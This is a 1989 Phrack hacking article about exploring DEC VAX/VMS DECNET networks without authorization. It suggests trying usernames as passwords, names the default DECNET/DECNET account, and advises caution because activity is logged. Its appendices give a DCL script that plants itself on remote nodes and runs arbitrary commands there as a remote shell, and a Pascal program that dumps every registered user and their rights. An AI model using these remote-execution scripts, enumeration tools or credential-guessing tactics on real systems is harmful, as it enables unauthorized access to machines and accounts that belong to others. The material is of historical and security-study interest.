| ==Phrack Inc.== | |
| Volume Three, Issue 27, File 6 of 12 | |
| <<<<<<<<<<<<<<<<<<<<<<*>>>>>>>>>>>>>>>>>>>>>> | |
| <<< >>> | |
| <<< Looking Around In DECNET >>> | |
| <<< >>> | |
| <<< by Deep Thought of West Germany >>> | |
| <<< >>> | |
| <<< June 1, 1989 >>> | |
| <<< >>> | |
| <<<<<<<<<<<<<<<<<<<<<<*>>>>>>>>>>>>>>>>>>>>>> | |
| Disclaimer: I take no responsibility for any use or abuse of the information | |
| contained in this article, nor for any damage caused by the use of | |
| methods described. DECNET, VAX, and VMS are possibly registered | |
| trademarks of Digital Equipment Corporation. | |
| There comes a time when every somewhat intelligent programmer asks: Is hacking | |
| difficult? Now, being in a university network, why don't just give it a try? | |
| Since one is an official student and somewhat authorized to use the computing | |
| facilities, testing the modern means of communication should cause no trouble. | |
| Well, you start searching on those nodes, you have official access for | |
| interesting programs and procedures. And you find: Netdcl, just one program | |
| of many, that obviously enables one to run commands on remote nodes without | |
| having an account on these nodes. A really interesting thing, as nearly | |
| everything is allowed that a normal user can do. | |
| The dear reader may start to think: Wasn't there always the shouting about VMS | |
| being the MOST SECURE computer system, making it UNPENETRABLE to hackers? Ok, | |
| cool down, this feature can be disabled and so, you think, if someone has super | |
| secret data on his VAX, he will stop any use or abuse of this feature. | |
| 2nd Act -- Somewhere one has heard about some mystery things called system | |
| calls. Since one always wanted to know about how to react on keystrokes on a | |
| VAX (really being not trivial!) you start reading the manuals more precisely to | |
| find out how to do it in Pascal. | |
| Randomly on browsing thru the pages you discover functions which deliver | |
| information about Userids. This comes in handy, as a friend engaged in | |
| university politics wants to distribute a leaflet by email to all registered | |
| users. In fact, it's completely unproblematic to gain a list of all users. An | |
| example program, although written in Assembler, is even contained in the | |
| manuals. Enjoy a list of 1000 Userids complete with information about network | |
| access rights. The Pascal program is contained in Appendix B (later in this | |
| file). | |
| Sorry, passwords are not stored in this list. Even the Sysop can't access | |
| them, so that's no great loss. Guess what passwords many accounts have? Sure, | |
| just try the username. It's really amazing how ignorant users can be. Of | |
| course this is a problem of group-accounts, that many users have access to and | |
| must know the password. Nevertheless, the hole is there. | |
| The real hacker, once he has logged in on such an account surely finds ways to | |
| gain system privilege. This requires in-depth knowledge of the Kernel of VMS | |
| and is another story I won't deal with. | |
| What is DECNET? | |
| ~~~~~~~~~~~~~~~ | |
| DECNET is the means, by which computers from Digital Equipment Corporation | |
| (DEC) can be connected to each other. Each computer in this network has an | |
| address which is normally given by x.y where x is the area number (an integer) | |
| and y is the node number in this area which ranges from 1 to 1023. To access | |
| DECNET nodes, one specifies just one number, which can be computed from x and y | |
| by the following formula: | |
| nodenumber = x * 1024 + y | |
| Often nodes, especially local nodes (having the same area number as your | |
| current node) have names assigned to them so they can be memorized more easily. | |
| Interesting DECNET Commands | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| To get a (first) list of available DECNET nodes, try the command | |
| $ SHOW NET | |
| The $ (as in the following examples) is the default prompt of VMS and should | |
| not be entered. This Command will give you a list of (hopefully) reachable | |
| nodes. All lines of the output contain the network address in the form x.y and | |
| normally a name which this node is known by. | |
| Your current node is mentioned in the first line in "VAX/VMS network status for | |
| local node X.Y Name". In most cases you will then just see local nodes listed | |
| and a line saying "The next hop to the nearest area router is node XX.YY". | |
| This node contains more information about the DECNET than the node you are | |
| currently on. If you have an account on the specified node, log on there and | |
| try again. If not, well, play with the local nodes listed and look at the | |
| command NCP shown later. | |
| Now, what can you do with those nodes that were mentioned in the output? | |
| First command is | |
| $ SET HOST <node> | |
| Where <node> is either a nodename or a nodenumber (see above). Thus, if SDIVAX | |
| was listed in the SHOW NET list as 42.13, then you may try both SET HOST SDIVAX | |
| or SET HOST 43021 (42*1024+13 = 43021). Probably you'll get that ugly | |
| Username: prompt. You're on your own then. | |
| Second thing you can do with DECNET is email. On VMS the MAIL program can send | |
| mail to other users. If you and your friend both have accounts on the same | |
| DECNET, you can send him mail if you know his nodename or nodenumber by | |
| specifying SDIVAX::FREDDY or 43021::FREDDY. | |
| Then there is PHONE. This is a utility to talk to another (or several) user(s) | |
| on a DECNET. If you want to call Freddy, just type PHONE SDIVAX::FREDDY. If | |
| he is logged in, his terminal will ring and if he answers his phone (with PHONE | |
| ANSWER) you may chat with him. PHONE has another nice feature built in: You | |
| may ask for a list of active users on a remote name by %DIR SDIVAX. See the | |
| online help on PHONE for further details. | |
| The next really mighty DECNET facility is remote file access. Valid filenames | |
| in VMS consist of the components node, disk, directory and filename. An | |
| example for a valid filename is SDIVAX::DISK$2:[NASA.SECRET]SDI.DOC where some | |
| components may be omitted and default values are used instead. | |
| File names including the node specification may be used in nearly all VMS | |
| commands examples being DIR, TYPE and COPY. Access to the specified file is | |
| granted, if the protection of the file allows access by world, or if the owner | |
| of the file is the user DECNET. This pseudo userid is available on every VAX | |
| and has the password DECNET. Access to that account is limited to network | |
| processing so you can't just log in with Username=DECNET, password=DECNET. By | |
| default a special directory owned by the User DECNET exists on each node. This | |
| directory can be accessed by just specifying the nodename without any disk or | |
| directory information, as in | |
| $ DIR SDIVAX:: | |
| If users played too much with this feature, the directory may be protected or | |
| otherwise disabled. | |
| The last feature described here is the remote command processing facility. If | |
| you try to open a file with the specification | |
| $ SDIVAX::"task=foo.com" | |
| Instead of opening the DCL procedure, foo.com will be executed. To make use of | |
| this feature easily, programs have been written to interactively communicate | |
| with a remote host. The command procedure NETDCL.COM does this task and is | |
| contained in the Appendix A (seen later in this file. Look at this | |
| DCL-Procedure to learn more about DECNET features. | |
| The Key To Universal Knowledge | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| There is a pearl under the programs on a VAX. It's called NCP and will give | |
| readily information about the whole DECNET. You start this program either by | |
| MCR NCP or by doing a SET DEF SYS$SYSTEM and RUN NCP. Use the on-line Help | |
| provided in NCP (which means Network Control Program) to learn more. | |
| NCP> SHOW KNOWN NODES | |
| Provides a list of all nodes known on your current node, including the names | |
| you may use as node specifications. But there is more: You may connect to | |
| another node's database and get a list of nodes which are known at the remote | |
| node with | |
| NCP> SET EXEC SDIVAX | |
| And then again the SHOW KNOWN NODES command. This feature should provide you | |
| with a nearly infinite list of node names and node numbers. | |
| Conclusion | |
| ~~~~~~~~~~ | |
| There are many nice features available under DECNET. Probably I don't know | |
| all, but I hope this article showed you the mighty tools available on VMS to | |
| make network life easier. | |
| WARNING: The author has had bad experiences with some node administrators, | |
| who didn't like their machines being contacted over DECNET. Yes, | |
| that's the drawback, each DECNET activity is written to a protocol | |
| file that is printed and deleted every month. So you should be | |
| careful in using DECNET. | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| APPENDIX A: | |
| The Procedure NETDCL.COM, sometimes called TELL.COM, NET.COM | |
| ----------------------- | |
| $ IF f$mode() .EQS. "NETWORK" THEN GOTO network | |
| $ IF p1 .EQS. "" THEN READ/PROMPT="_Node: " sys$command p1 | |
| $ nodespec = p1 - "::" | |
| $ nodename = f$extract(0,f$locate("""",nodespec),nodespec) | |
| $! include the following line for "hard cases" | |
| $! nodespec = nodespec+"""decnet decnet""" | |
| $ ON WARNING THEN CONTINUE | |
| $ CLOSE/ERR=open_server dcl_server | |
| $open_server: | |
| $ OPEN/READ/WRITE dcl_server 'nodespec'::"TASK=NETDCL"/ERROR=open_failure | |
| $ ON WARNING THEN GOTO exit | |
| $flush_output: | |
| $ READ dcl_server record | |
| $ IF record .EQS. "SEND_ME_A_COMMAND" - | |
| THEN GOTO send_command | |
| $ WRITE sys$output record | |
| $ GOTO flush_output | |
| $send_command: | |
| $ IF p2 .NES. "" THEN GOTO single_command | |
| $ READ sys$command record /PROMPT="''nodename'> " /END=exit | |
| $ record := 'record | |
| $ IF record .EQS. "EXIT" THEN GOTO exit | |
| $ WRITE dcl_server record | |
| $ GOTO flush_output | |
| $single_command: | |
| $ command := 'p2' 'p3' 'p4' 'p5' 'p6' 'p7' 'p8' | |
| $ WRITE dcl_server command | |
| $single_flush: | |
| $ READ dcl_server record | |
| $ IF record .EQS. "SEND_ME_A_COMMAND"- | |
| $ THEN GOTO exit | |
| $ WRITE sys$output record | |
| $ GOTO single_flush | |
| $open_failure: | |
| $ ON WARNING THEN EXIT | |
| $ COPY/LOG Netdcl.Com 'nodespec':: | |
| $ WAIT 0:0:1 | |
| $ OPEN/READ/WRITE dcl_server 'nodespec'::"TASK=NETDCL" | |
| $ ON WARNING THEN GOTO exit | |
| $ GOTO flush_output | |
| $exit: | |
| $ CLOSE dcl_server | |
| $ EXIT | |
| $network: | |
| $ OPEN/READ/WRITE dcl_link sys$net | |
| $ SET NOON | |
| $ dcl_verify = 'f$verify(0)' | |
| $ DEFINE sys$output dcl_link: | |
| $server_loop: | |
| $ WRITE dcl_link "SEND_ME_A_COMMAND" | |
| $ READ dcl_link dcl_string /END_OF_FILE=server_exit /ERROR=server_exit | |
| $ 'dcl_string' | |
| $ GOTO server_loop | |
| $server_exit: | |
| $ IF dcl_verify THEN set verify | |
| $ CLOSE dcl_link | |
| $ DEASSIGN sys$output | |
| $ EXIT | |
| ----------------------- | |
| APPENDIX B | |
| ALLUSER.PAS - Show all registered users | |
| ----------------------- | |
| { | |
| * alluser.pas - get names of all users | |
| * by Deep, 1989 | |
| * This program is freely redistributable as long no modifications are made | |
| * DISCLAIMER: I take no responsibility for any use or abuse of this | |
| * program. It is given for informational purpose only. | |
| * | |
| * program history: | |
| * 04-May-89 started | |
| * 02-Jun-89 clean up of code | |
| } | |
| [inherit ('sys$library:starlet.pen')] | |
| program alluser(input,output); | |
| type $word = [word] 0..65535; | |
| $byte = [byte] 0..255; | |
| $quadword = record | |
| lo,hi : unsigned; | |
| end; | |
| $uquad = record | |
| lo,hi : unsigned; | |
| end; | |
| var | |
| id: unsigned; | |
| status, status2: integer; | |
| length: $WORD; | |
| attrib,context,context2,context3: unsigned; | |
| ident, ident2: unsigned; | |
| name: varying [512] of char; | |
| holder: $uquad; | |
| begin | |
| writeln('Alluser - use at your own risk!'); | |
| status := SS$_NORMAL; | |
| { id = -1 selects next identifier } | |
| id := -1; | |
| context := 0; | |
| while (status <> SS$_NOSUCHID) do | |
| begin | |
| { find next identifier } | |
| status := $idtoasc(id,name.length,name.body,ident,attrib,context); | |
| if (status <> SS$_NOSUCHID) then begin | |
| write(pad(name,' ',16)); | |
| if (ident div (65536*32768) > 0) then | |
| { it's a rights-list, so print the hex-value of the identifier } | |
| begin | |
| writeln(oct(ident,12)); | |
| context2 := 0; | |
| context3 := 0; | |
| { find all holders of this right } | |
| repeat | |
| holder := zero; | |
| status2 := $find_holder(ident,holder,attrib,context2); | |
| if (holder.lo <> 0) then begin | |
| ident2 := ident; | |
| { get UIC and username } | |
| status := $idtoasc(holder.lo,name.length,name.body,ident2 | |
| ,attrib,context3); | |
| write(' ',pad(name,' ',16)); | |
| writeln('[',oct(holder.lo div 65536,3),',' | |
| ,oct(holder.lo mod 65536,3),']'); | |
| end; | |
| until (holder.lo = 0); | |
| end | |
| else | |
| { it's a UIC, so translate to [grp,user] } | |
| begin | |
| writeln('[',oct(ident div 65536,3),',',oct(ident mod 65536,3),']'); | |
| end; | |
| end; | |
| end; | |
| end. | |
| ----------------------- | |
| This article has been brought to you by Deep Thought of West Germany. If you | |
| liked this article, grant me access if I once drop in your BBS! | |
| _______________________________________________________________________________ | |